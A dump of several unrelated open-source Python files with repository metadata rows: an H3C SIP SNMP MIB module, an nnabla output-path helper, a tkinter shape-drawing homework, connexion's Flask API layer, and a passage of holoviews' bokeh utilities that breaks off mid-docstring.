h3cSIPRegisterPhoneNumber = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 7), OctetString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterPhoneNumber.setStatus('current')
h3cSIPRegisterEnable = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPRegisterEnable.setStatus('current')
h3cSIPTrapsControl = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPTrapsControl.setStatus('current')
h3cSIPStatisticClear = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("clear", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cSIPStatisticClear.setStatus('current')
h3cSIPServerConfigTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2), )
if mibBuilder.loadTexts: h3cSIPServerConfigTable.setStatus('current')
h3cSIPServerConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPServerIPAddressType"), (0, "H3C-VOSIP-MIB", "h3cSIPServerIPAddress"), (0, "H3C-VOSIP-MIB", "h3cSIPServerPort"))
if mibBuilder.loadTexts: h3cSIPServerConfigEntry.setStatus('current')
h3cSIPServerIPAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 1), InetAddressType()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerIPAddressType.setStatus('current')
h3cSIPServerIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 2), InetAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerIPAddress.setStatus('current')
h3cSIPServerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(5060)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPServerPort.setStatus('current')
h3cSIPServerType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("master", 1), ("slave", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPServerType.setStatus('current')
h3cSIPAcceptType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("inbound", 1), ("all", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPAcceptType.setStatus('current')
h3cSIPServerStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 2, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cSIPServerStatus.setStatus('current')
h3cSIPMsgStatTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3), )
if mibBuilder.loadTexts: h3cSIPMsgStatTable.setStatus('current')
h3cSIPMsgStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPMsgIndex"))
if mibBuilder.loadTexts: h3cSIPMsgStatEntry.setStatus('current')
h3cSIPMsgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 1), SipMsgType())
if mibBuilder.loadTexts: h3cSIPMsgIndex.setStatus('current')
h3cSIPMsgName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 2), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgName.setStatus('current')
h3cSIPMsgSend = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgSend.setStatus('current')
h3cSIPMsgOKSend = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgOKSend.setStatus('current')
h3cSIPMsgReceive = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgReceive.setStatus('current')
h3cSIPMsgOKReceive = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgOKReceive.setStatus('current')
h3cSIPMsgResponseStatTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4), )
if mibBuilder.loadTexts: h3cSIPMsgResponseStatTable.setStatus('current')
h3cSIPMsgResponseStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1), ).setIndexNames((0, "H3C-VOSIP-MIB", "h3cSIPMsgResponseIndex"))
if mibBuilder.loadTexts: h3cSIPMsgResponseStatEntry.setStatus('current')
h3cSIPMsgResponseIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 1), Integer32())
if mibBuilder.loadTexts: h3cSIPMsgResponseIndex.setStatus('current')
h3cSIPMsgResponseCode = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 2), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPMsgResponseCode.setStatus('current')
h3cSIPResCodeRecvCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPResCodeRecvCount.setStatus('current')
h3cSIPResCodeSendCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 1, 4, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cSIPResCodeSendCount.setStatus('current')
h3cSIPTrapStubObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3))
h3cSIPRegisterFailReason = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPRegisterFailReason.setStatus('current')
h3cSIPAuthenReqMethod = MibScalar((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 3, 2), SipMsgType()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: h3cSIPAuthenReqMethod.setStatus('current')
h3cSIPClientNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4))
h3cSIPRegisterFailure = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 1)).setObjects(("H3C-VOSIP-MIB", "h3cSIPID"), ("H3C-VOSIP-MIB", "h3cSIPServerIPAddressType"), ("H3C-VOSIP-MIB", "h3cSIPServerIPAddress"), ("H3C-VOSIP-MIB", "h3cSIPServerPort"), ("H3C-VOSIP-MIB", "h3cSIPRegisterFailReason"))
if mibBuilder.loadTexts: h3cSIPRegisterFailure.setStatus('current')
h3cSIPAuthenticateFailure = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 2)).setObjects(("H3C-VOSIP-MIB", "h3cSIPID"), ("H3C-VOSIP-MIB", "h3cSIPAuthenReqMethod"))
if mibBuilder.loadTexts: h3cSIPAuthenticateFailure.setStatus('current')
h3cSIPServerSwitch = NotificationType((1, 3, 6, 1, 4, 1, 2011, 10, 2, 39, 12, 4, 3))
if mibBuilder.loadTexts: h3cSIPServerSwitch.setStatus('current')
mibBuilder.exportSymbols("H3C-VOSIP-MIB", h3cSIPResCodeRecvCount=h3cSIPResCodeRecvCount, SipMsgType=SipMsgType, h3cSIPMsgResponseIndex=h3cSIPMsgResponseIndex, h3cSIPMsgOKSend=h3cSIPMsgOKSend, h3cSIPMsgResponseStatEntry=h3cSIPMsgResponseStatEntry, h3cSIPMsgResponseCode=h3cSIPMsgResponseCode, h3cSIPID=h3cSIPID, h3cSIPRegisterPhoneNumber=h3cSIPRegisterPhoneNumber, h3cVoSIP=h3cVoSIP, h3cSIPRegisterFailure=h3cSIPRegisterFailure, h3cSIPRegisterFailReason=h3cSIPRegisterFailReason, h3cSIPServerIPAddress=h3cSIPServerIPAddress, h3cSIPTrapStubObjects=h3cSIPTrapStubObjects, h3cSIPPasswordType=h3cSIPPasswordType, h3cSIPRegisterMode=h3cSIPRegisterMode, h3cSIPClientMIB=h3cSIPClientMIB, h3cSIPResCodeSendCount=h3cSIPResCodeSendCount, h3cSIPSourceIP=h3cSIPSourceIP, h3cSIPMsgStatTable=h3cSIPMsgStatTable, h3cSIPServerConfigTable=h3cSIPServerConfigTable, h3cSIPClientConfigObjects=h3cSIPClientConfigObjects, h3cSIPMsgIndex=h3cSIPMsgIndex, h3cSIPServerType=h3cSIPServerType, h3cSIPClientNotifications=h3cSIPClientNotifications, h3cSIPPassword=h3cSIPPassword, h3cSIPMsgStatEntry=h3cSIPMsgStatEntry, PYSNMP_MODULE_ID=h3cVoSIP, h3cSIPServerIPAddressType=h3cSIPServerIPAddressType, h3cSIPMsgName=h3cSIPMsgName, h3cSIPMsgOKReceive=h3cSIPMsgOKReceive, h3cSIPMsgReceive=h3cSIPMsgReceive, h3cSIPTrapsControl=h3cSIPTrapsControl, h3cSIPMsgSend=h3cSIPMsgSend, h3cSIPMsgResponseStatTable=h3cSIPMsgResponseStatTable, h3cSIPRegisterEnable=h3cSIPRegisterEnable, h3cSIPServerConfigEntry=h3cSIPServerConfigEntry, h3cSIPAuthenReqMethod=h3cSIPAuthenReqMethod, h3cSIPServerPort=h3cSIPServerPort, h3cSIPServerStatus=h3cSIPServerStatus, h3cSIPAuthenticateFailure=h3cSIPAuthenticateFailure, h3cSIPServerSwitch=h3cSIPServerSwitch, h3cSIPAcceptType=h3cSIPAcceptType, h3cSIPStatisticClear=h3cSIPStatisticClear, h3cSIPSourceIPAddressType=h3cSIPSourceIPAddressType)
| 124.398058 | 1,827 | 0.758448 |
3bffeafde604e3613f7ea1cfd8b0257afddeae33
| 1,092 |
py
|
Python
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 228 |
2017-11-20T06:05:56.000Z
|
2022-03-23T12:40:05.000Z
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 36 |
2018-01-11T23:26:20.000Z
|
2022-03-12T00:53:38.000Z
|
reinforcement_learning/dqn/output_path.py
|
AaratiAkkapeddi/nnabla-examples
|
db9e5ad850303c158773aeb275e5c3821b4a3935
|
[
"Apache-2.0"
] | 76 |
2017-11-22T22:00:00.000Z
|
2022-03-28T05:58:57.000Z
|
# Copyright 2019,2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
class OutputPath(object):
def __init__(self, path='./tmp.output/'):
if not os.path.isdir(path):
os.makedirs(path)
self.path = path
def get_filepath(self, name):
return os.path.join(self.path, name)
_default_output_path = None
def default_output_path():
global _default_output_path
if _default_output_path is None:
_default_output_path = OutputPath()
return _default_output_path
| 29.513514 | 74 | 0.728022 |
b27588331abbe7e533168e14108529e9a2864cb8
| 2,314 |
py
|
Python
|
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
CS-190/Homework/HW10.py
|
lividsubset3/College-CS
|
6f1eb6b10e43a37654335331758677c797034961
|
[
"MIT"
] | null | null | null |
from tkinter import *
root = Tk()
root.title('Homework 10')
canvas = Canvas(root, width=400, height=400)
canvas.pack()
def circle(x, y, radius, color):
canvas.create_oval(x, y, x + radius, y + radius, fill=color, outline=color)
def rectangle(x, y, width, height, color):
canvas.create_rectangle(x, y, x + width, y + height, fill=color, outline=color)
def triangle(x, y, size, color):
canvas.create_polygon(x - size // 2, y, x + size // 2, y, x, y - size // 2, fill=color, outline=color)
# do not modify code above this line!
# ===============================================================================================
def go():
try:
init = input("Input File: ")
# init = "HW10.txt"
with open(init) as f:
for line in f:
L = line.split(' ')
for shape_type in L:
if shape_type == 'triangle':
x = int(L[1])
y = int(L[2])
size = int(L[3])
color = L[4].rstrip()
triangle(x, y, size, color)
elif shape_type == 'rectangle':
x = int(L[1])
y = int(L[2])
width = int(L[3])
height = int(L[4])
color = L[5].rstrip()
rectangle(x, y, width, height, color)
elif shape_type == 'circle':
x = int(L[1])
y = int(L[2])
radius = int(L[3])
color = L[4].rstrip()
circle(x, y, radius, color)
elif shape_type == 'square':
x = int(L[1])
y = int(L[2])
width = int(L[3])
height = int(L[3])
color = L[4].rstrip()
rectangle(x, y, width, height, color)
except Exception as e:
print(e)
print("Error | 404 | File Not found")
# do not modify code below this line!
# ===============================================================================================
if __name__ == '__main__':
go()
root.mainloop()
| 33.057143 | 106 | 0.386776 |
d2050b106573523514b5e814277d3e77d1466622
| 12,740 |
py
|
Python
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 1 |
2020-04-07T05:26:37.000Z
|
2020-04-07T05:26:37.000Z
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 3 |
2021-08-30T16:30:50.000Z
|
2022-03-01T23:15:44.000Z
|
connexion/apis/flask_api.py
|
engsas/connexion
|
abb43a42fb62ef56cb1e0f06c2167cca2f5b9f96
|
[
"Apache-2.0"
] | 3 |
2018-06-26T22:54:02.000Z
|
2019-04-03T20:54:17.000Z
|
import logging
import warnings
import flask
import werkzeug.exceptions
from connexion.apis import flask_utils
from connexion.apis.abstract import AbstractAPI
from connexion.handlers import AuthErrorHandler
from connexion.jsonifier import Jsonifier
from connexion.lifecycle import ConnexionRequest, ConnexionResponse
from connexion.utils import is_json_mimetype, yamldumper
from werkzeug.local import LocalProxy
logger = logging.getLogger('connexion.apis.flask_api')
class FlaskApi(AbstractAPI):
def _set_base_path(self, base_path):
super(FlaskApi, self)._set_base_path(base_path)
self._set_blueprint()
def _set_blueprint(self):
logger.debug('Creating API blueprint: %s', self.base_path)
endpoint = flask_utils.flaskify_endpoint(self.base_path)
self.blueprint = flask.Blueprint(endpoint, __name__, url_prefix=self.base_path,
template_folder=str(self.options.openapi_console_ui_from_dir))
def add_openapi_json(self):
"""
Adds spec json to {base_path}/swagger.json
or {base_path}/openapi.json (for oas3)
"""
logger.debug('Adding spec json: %s/%s', self.base_path,
self.options.openapi_spec_path)
endpoint_name = "{name}_openapi_json".format(name=self.blueprint.name)
self.blueprint.add_url_rule(self.options.openapi_spec_path,
endpoint_name,
self._handlers.get_json_spec)
def add_openapi_yaml(self):
"""
Adds spec yaml to {base_path}/swagger.yaml
or {base_path}/openapi.yaml (for oas3)
"""
if not self.options.openapi_spec_path.endswith("json"):
return
openapi_spec_path_yaml = \
self.options.openapi_spec_path[:-len("json")] + "yaml"
logger.debug('Adding spec yaml: %s/%s', self.base_path,
openapi_spec_path_yaml)
endpoint_name = "{name}_openapi_yaml".format(name=self.blueprint.name)
self.blueprint.add_url_rule(
openapi_spec_path_yaml,
endpoint_name,
self._handlers.get_yaml_spec
)
def add_swagger_ui(self):
"""
Adds swagger ui to {base_path}/ui/
"""
console_ui_path = self.options.openapi_console_ui_path.strip('/')
logger.debug('Adding swagger-ui: %s/%s/',
self.base_path,
console_ui_path)
if self.options.openapi_console_ui_config is not None:
config_endpoint_name = "{name}_swagger_ui_config".format(name=self.blueprint.name)
config_file_url = '/{console_ui_path}/swagger-ui-config.json'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(config_file_url,
config_endpoint_name,
lambda: flask.jsonify(self.options.openapi_console_ui_config))
static_endpoint_name = "{name}_swagger_ui_static".format(name=self.blueprint.name)
static_files_url = '/{console_ui_path}/<path:filename>'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(static_files_url,
static_endpoint_name,
self._handlers.console_ui_static_files)
index_endpoint_name = "{name}_swagger_ui_index".format(name=self.blueprint.name)
console_ui_url = '/{console_ui_path}/'.format(
console_ui_path=console_ui_path)
self.blueprint.add_url_rule(console_ui_url,
index_endpoint_name,
self._handlers.console_ui_home)
def add_auth_on_not_found(self, security, security_definitions):
"""
Adds a 404 error handler to authenticate and only expose the 404 status if the security validation pass.
"""
logger.debug('Adding path not found authentication')
not_found_error = AuthErrorHandler(self, werkzeug.exceptions.NotFound(), security=security,
security_definitions=security_definitions)
endpoint_name = "{name}_not_found".format(name=self.blueprint.name)
self.blueprint.add_url_rule('/<path:invalid_path>', endpoint_name, not_found_error.function)
def _add_operation_internal(self, method, path, operation):
operation_id = operation.operation_id
logger.debug('... Adding %s -> %s', method.upper(), operation_id,
extra=vars(operation))
flask_path = flask_utils.flaskify_path(path, operation.get_path_parameter_types())
endpoint_name = flask_utils.flaskify_endpoint(operation.operation_id,
operation.randomize_endpoint)
function = operation.function
self.blueprint.add_url_rule(flask_path, endpoint_name, function, methods=[method])
@property
def _handlers(self):
# type: () -> InternalHandlers
if not hasattr(self, '_internal_handlers'):
self._internal_handlers = InternalHandlers(self.base_path, self.options, self.specification)
return self._internal_handlers
@classmethod
def get_response(cls, response, mimetype=None, request=None):
"""Gets ConnexionResponse instance for the operation handler
result. Status Code and Headers for response. If only body
data is returned by the endpoint function, then the status
code will be set to 200 and no headers will be added.
If the returned object is a flask.Response then it will just
pass the information needed to recreate it.
:type response: flask.Response | (flask.Response,) | (flask.Response, int) | (flask.Response, dict) | (flask.Response, int, dict)
:rtype: ConnexionResponse
"""
return cls._get_response(response, mimetype=mimetype, extra_context={"url": flask.request.url})
@classmethod
def _is_framework_response(cls, response):
""" Return True if provided response is a framework type """
return flask_utils.is_flask_response(response)
@classmethod
def _framework_to_connexion_response(cls, response, mimetype):
""" Cast framework response class to ConnexionResponse used for schema validation """
return ConnexionResponse(
status_code=response.status_code,
mimetype=response.mimetype,
content_type=response.content_type,
headers=response.headers,
body=response.get_data(),
)
@classmethod
def _connexion_to_framework_response(cls, response, mimetype, extra_context=None):
""" Cast ConnexionResponse to framework response class """
flask_response = cls._build_response(
mimetype=response.mimetype or mimetype,
content_type=response.content_type,
headers=response.headers,
status_code=response.status_code,
data=response.body,
extra_context=extra_context,
)
return flask_response
@classmethod
def _build_response(cls, mimetype, content_type=None, headers=None, status_code=None, data=None, extra_context=None):
if cls._is_framework_response(data):
return flask.current_app.make_response((data, status_code, headers))
data, status_code, serialized_mimetype = cls._prepare_body_and_status_code(data=data, mimetype=mimetype, status_code=status_code, extra_context=extra_context)
kwargs = {
'mimetype': mimetype or serialized_mimetype,
'content_type': content_type,
'headers': headers,
'response': data,
'status': status_code
}
kwargs = {k: v for k, v in kwargs.items() if v is not None}
return flask.current_app.response_class(**kwargs) # type: flask.Response
@classmethod
def _serialize_data(cls, data, mimetype):
# TODO: harmonize flask and aiohttp serialization when mimetype=None or mimetype is not JSON
# (cases where it might not make sense to jsonify the data)
if (isinstance(mimetype, str) and is_json_mimetype(mimetype)):
body = cls.jsonifier.dumps(data)
elif not (isinstance(data, bytes) or isinstance(data, str)):
warnings.warn(
"Implicit (flask) JSON serialization will change in the next major version. "
"This is triggered because a response body is being serialized as JSON "
"even though the mimetype is not a JSON type. "
"This will be replaced by something that is mimetype-specific and may "
"raise an error instead of silently converting everything to JSON. "
"Please make sure to specify media/mime types in your specs.",
FutureWarning # a Deprecation targeted at application users.
)
body = cls.jsonifier.dumps(data)
else:
body = data
return body, mimetype
@classmethod
def get_request(cls, *args, **params):
# type: (*Any, **Any) -> ConnexionRequest
"""Gets ConnexionRequest instance for the operation handler
result. Status Code and Headers for response. If only body
data is returned by the endpoint function, then the status
code will be set to 200 and no headers will be added.
If the returned object is a flask.Response then it will just
pass the information needed to recreate it.
:rtype: ConnexionRequest
"""
context_dict = {}
setattr(flask._request_ctx_stack.top, 'connexion_context', context_dict)
flask_request = flask.request
request = ConnexionRequest(
flask_request.url,
flask_request.method,
headers=flask_request.headers,
form=flask_request.form,
query=flask_request.args,
body=flask_request.get_data(),
json_getter=lambda: flask_request.get_json(silent=True),
files=flask_request.files,
path_params=params,
context=context_dict
)
logger.debug('Getting data and status code',
extra={
'data': request.body,
'data_type': type(request.body),
'url': request.url
})
return request
@classmethod
def _set_jsonifier(cls):
"""
Use Flask specific JSON loader
"""
cls.jsonifier = Jsonifier(flask.json, indent=2)
def _get_context():
return getattr(flask._request_ctx_stack.top, 'connexion_context')
context = LocalProxy(_get_context)
class InternalHandlers(object):
"""
Flask handlers for internally registered endpoints.
"""
def __init__(self, base_path, options, specification):
self.base_path = base_path
self.options = options
self.specification = specification
def console_ui_home(self):
"""
Home page of the OpenAPI Console UI.
:return:
"""
openapi_json_route_name = "{blueprint}.{prefix}_openapi_json"
escaped = flask_utils.flaskify_endpoint(self.base_path)
openapi_json_route_name = openapi_json_route_name.format(
blueprint=escaped,
prefix=escaped
)
template_variables = {
'openapi_spec_url': flask.url_for(openapi_json_route_name)
}
if self.options.openapi_console_ui_config is not None:
template_variables['configUrl'] = 'swagger-ui-config.json'
return flask.render_template('index.j2', **template_variables)
def console_ui_static_files(self, filename):
"""
Servers the static files for the OpenAPI Console UI.
:param filename: Requested file contents.
:return:
"""
# convert PosixPath to str
static_dir = str(self.options.openapi_console_ui_from_dir)
return flask.send_from_directory(static_dir, filename)
def get_json_spec(self):
return flask.jsonify(self._spec_for_prefix())
def get_yaml_spec(self):
return yamldumper(self._spec_for_prefix()), 200, {"Content-Type": "text/yaml"}
def _spec_for_prefix(self):
"""
Modify base_path in the spec based on incoming url
This fixes problems with reverse proxies changing the path.
"""
base_path = flask.url_for(flask.request.endpoint).rsplit("/", 1)[0]
return self.specification.with_base_path(base_path).raw
| 40.96463 | 166 | 0.642465 |
398e2a0343f16513abe3f17b2afc3f7f850931a5
| 30,839 |
py
|
Python
|
holoviews/plotting/bokeh/util.py
|
archiba/holoviews
|
8fe3ac1507793e51e2f9bbc020abb49f19b41b90
|
[
"BSD-3-Clause"
] | null | null | null |
holoviews/plotting/bokeh/util.py
|
archiba/holoviews
|
8fe3ac1507793e51e2f9bbc020abb49f19b41b90
|
[
"BSD-3-Clause"
] | null | null | null |
holoviews/plotting/bokeh/util.py
|
archiba/holoviews
|
8fe3ac1507793e51e2f9bbc020abb49f19b41b90
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, unicode_literals
import re
import time
import sys
import calendar
import datetime as dt
from collections import defaultdict
from contextlib import contextmanager
import param
import bokeh
import numpy as np
from bokeh.core.json_encoder import serialize_json # noqa (API import)
from bokeh.core.properties import value
from bokeh.core.validation import silence
from bokeh.layouts import WidgetBox, Row, Column
from bokeh.models import tools
from bokeh.models import Model, ToolbarBox, FactorRange, Range1d, Plot, Spacer, CustomJS, GridBox
from bokeh.models.widgets import DataTable, Tabs, Div
from bokeh.plotting import Figure
from bokeh.themes.theme import Theme
try:
from bokeh.themes import built_in_themes
except:
built_in_themes = {}
try:
from bkcharts import Chart
except:
Chart = type(None) # Create stub for isinstance check
from ...core.ndmapping import NdMapping
from ...core.overlay import Overlay
from ...core.util import (
LooseVersion, _getargspec, basestring, callable_name, cftime_types,
cftime_to_timestamp, pd, unique_array, isnumeric, arraylike_types)
from ...core.spaces import get_nested_dmaps, DynamicMap
from ..util import dim_axis_label
bokeh_version = LooseVersion(bokeh.__version__) # noqa
TOOL_TYPES = {
'pan': tools.PanTool,
'xpan': tools.PanTool,
'ypan': tools.PanTool,
'xwheel_pan': tools.WheelPanTool,
'ywheel_pan': tools.WheelPanTool,
'wheel_zoom': tools.WheelZoomTool,
'xwheel_zoom': tools.WheelZoomTool,
'ywheel_zoom': tools.WheelZoomTool,
'zoom_in': tools.ZoomInTool,
'xzoom_in': tools.ZoomInTool,
'yzoom_in': tools.ZoomInTool,
'zoom_out': tools.ZoomOutTool,
'xzoom_out': tools.ZoomOutTool,
'yzoom_out': tools.ZoomOutTool,
'click': tools.TapTool,
'tap': tools.TapTool,
'crosshair': tools.CrosshairTool,
'box_select': tools.BoxSelectTool,
'xbox_select': tools.BoxSelectTool,
'ybox_select': tools.BoxSelectTool,
'poly_select': tools.PolySelectTool,
'lasso_select': tools.LassoSelectTool,
'box_zoom': tools.BoxZoomTool,
'xbox_zoom': tools.BoxZoomTool,
'ybox_zoom': tools.BoxZoomTool,
'hover': tools.HoverTool,
'save': tools.SaveTool,
'undo': tools.UndoTool,
'redo': tools.RedoTool,
'reset': tools.ResetTool,
'help': tools.HelpTool,
'box_edit': tools.BoxEditTool,
'point_draw': tools.PointDrawTool,
'poly_draw': tools.PolyDrawTool,
'poly_edit': tools.PolyEditTool,
'freehand_draw': tools.FreehandDrawTool
}
def convert_timestamp(timestamp):
"""
Converts bokehJS timestamp to datetime64.
"""
datetime = dt.datetime.utcfromtimestamp(timestamp/1000.)
return np.datetime64(datetime.replace(tzinfo=None))
def decode_bytes(array):
"""
Decodes an array, list or tuple of bytestrings to avoid python 3
bokeh serialization errors
"""
if (sys.version_info.major == 2 or not len(array) or
(isinstance(array, arraylike_types) and array.dtype.kind != 'O')):
return array
decoded = [v.decode('utf-8') if isinstance(v, bytes) else v for v in array]
if isinstance(array, np.ndarray):
return np.asarray(decoded)
elif isinstance(array, tuple):
return tuple(decoded)
return decoded
def layout_padding(plots, renderer):
"""
Pads Nones in a list of lists of plots with empty plots.
"""
widths, heights = defaultdict(int), defaultdict(int)
for r, row in enumerate(plots):
for c, p in enumerate(row):
if p is not None:
width, height = renderer.get_size(p)
widths[c] = max(widths[c], width)
heights[r] = max(heights[r], height)
expanded_plots = []
for r, row in enumerate(plots):
expanded_plots.append([])
for c, p in enumerate(row):
if p is None:
p = empty_plot(widths[c], heights[r])
elif hasattr(p, 'plot_width') and p.plot_width == 0 and p.plot_height == 0:
p.plot_width = widths[c]
p.plot_height = heights[r]
expanded_plots[r].append(p)
return expanded_plots
def compute_plot_size(plot):
"""
Computes the size of bokeh models that make up a layout such as
figures, rows, columns, widgetboxes and Plot.
"""
if isinstance(plot, GridBox):
ndmapping = NdMapping({(x, y): fig for fig, y, x in plot.children}, kdims=['x', 'y'])
cols = ndmapping.groupby('x')
rows = ndmapping.groupby('y')
width = sum([max([compute_plot_size(f)[0] for f in col]) for col in cols])
height = sum([max([compute_plot_size(f)[1] for f in row]) for row in rows])
return width, height
elif isinstance(plot, (Div, ToolbarBox)):
# Cannot compute size for Div or ToolbarBox
return 0, 0
elif isinstance(plot, (Row, Column, WidgetBox, Tabs)):
if not plot.children: return 0, 0
if isinstance(plot, Row) or (isinstance(plot, ToolbarBox) and plot.toolbar_location not in ['right', 'left']):
w_agg, h_agg = (np.sum, np.max)
elif isinstance(plot, Tabs):
w_agg, h_agg = (np.max, np.max)
else:
w_agg, h_agg = (np.max, np.sum)
widths, heights = zip(*[compute_plot_size(child) for child in plot.children])
return w_agg(widths), h_agg(heights)
elif isinstance(plot, (Figure, Chart)):
if plot.plot_width:
width = plot.plot_width
else:
width = plot.frame_width + plot.min_border_right + plot.min_border_left
if plot.plot_height:
height = plot.plot_height
else:
height = plot.frame_height + plot.min_border_bottom + plot.min_border_top
return width, height
elif isinstance(plot, (Plot, DataTable, Spacer)):
return plot.width, plot.height
else:
return 0, 0
def compute_layout_properties(
width, height, frame_width, frame_height, explicit_width,
explicit_height, aspect, data_aspect, responsive, size_multiplier,
logger=None):
"""
Utility to compute the aspect, plot width/height and sizing_mode
behavior.
Args:
width (int): Plot width
height (int): Plot height
frame_width (int): Plot frame width
frame_height (int): Plot frame height
explicit_width (list): List of user supplied widths
explicit_height (list): List of user supplied heights
aspect (float): Plot aspect
data_aspect (float): Scaling between x-axis and y-axis ranges
